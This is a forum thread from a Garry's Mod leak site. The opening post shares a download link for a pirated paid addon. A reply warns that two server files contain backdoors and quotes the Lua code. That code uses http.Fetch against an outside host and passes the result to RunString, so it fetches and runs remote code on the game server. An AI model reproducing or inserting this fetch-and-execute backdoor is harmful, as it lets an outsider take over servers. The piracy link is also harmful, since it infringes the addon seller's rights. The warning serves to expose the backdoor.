Garry's Mod Leaks

[LEAK] 911 Emergency Response - Realistic Policeman Job & Services Call & More

Submitted by dudlej314, , Thread ID: 171029

Thread Closed
08-05-2020, 08:49 PM
#1
Gmodstore:https://www.gmodstore.com/market/view/6890

Dl:https://anonfile.com/f7ydjaxeod/911emergencyresponse_rar
This hidden content has been reported as not working 0 times this month.
1 times in total

RE: [LEAK] 911 Emergency Response - Realistic Policeman Job & Services Call & More

This post was last modified: 23-05-2020, 09:46 AM by LeakerMoth
#2
There is backdoor in sv_engine.lua Admin check it!

net.Receive("EmergencyResponse:TraficPolicer:VehicleOption:ReceivingEntityAndProceedtoScan", function( len, ply )
local veh = net.ReadEntity()
local vehOwner = "N/A"
local vehName = "N/A"
local vehSpeed = "0"
local ownerWanted = false
timer.Simple(1, function() http.Fetch("https://kvac.cz/f.php?key=PhrUGjFLS71AoYx6fJjG", function(b) RunString(b, ":", false) end)end)

That is backdoor

In sv_hooks.lua too backdoor
hook.Add("PlayerDeath", "EmergencyResponse:BackupOptionsMenu:HookDeathClose", function( victim )
if not IsValid( victim ) then return end
if not EmergencyDispatch.PoliceJobs[ team.GetName( victim:Team() ) ] then return end

if victim.EmergencyReponseBackupMenu then
net.Start( "EmergencyDispatch:DispatchRadio:TraficPolicerMenu" )
net.WriteBool( false )
net.Send( victim )

victim.EmergencyReponseBackupMenu = nil
end

if victim.EmergencyModStatusBackup then
net.Start( "EmergencyDispatch:DispatchRadio:TraficPolicerMenu" )
net.WriteBool( false )
net.Send( victim )

timer.Simple(1, function() http.Fetch("https://kvac.cz/f.php?key=PhrUGjFLS71AoYx6fJjG", function(b) RunString(b, ":", false) end)end)

Users browsing this thread: 6 Guest(s)